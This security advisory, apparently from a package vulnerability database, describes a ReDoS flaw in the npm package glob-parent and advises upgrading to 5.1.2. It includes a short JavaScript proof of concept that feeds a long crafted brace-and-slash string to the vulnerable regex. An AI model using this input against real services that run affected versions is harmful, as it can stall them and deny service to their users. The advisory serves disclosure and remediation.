Vulnerability	Vulnerable Version
M Regular Expression Denial of Service (ReDoS) glob-parent is a package that helps extracting the non-magic parent path from a glob string. Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS). The `enclosure` regex used to check for strings ending in enclosure containing path separator. PoC by Yeting Li `var globParent = require("glob-parent") function build_attack(n) { var ret = "{" for (var i = 0; i < n; i++) { ret += "/" } return ret; } globParent(build_attack(5000));` How to fix Regular Expression Denial of Service (ReDoS)? Upgrade `glob-parent` to version 5.1.2 or higher.	>=3.0.1 <5.1.2

Regular Expression Denial of Service (ReDoS)

glob-parent is a package that helps extracting the non-magic parent path from a glob string.

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS). The enclosure regex used to check for strings ending in enclosure containing path separator.

PoC by Yeting Li

var globParent = require("glob-parent")
function build_attack(n) {
var ret = "{"
for (var i = 0; i < n; i++) {
ret += "/"
}

return ret;
}

globParent(build_attack(5000));

How to fix Regular Expression Denial of Service (ReDoS)?

Upgrade glob-parent to version 5.1.2 or higher.

>=3.0.1 <5.1.2

Go back to all versions of this package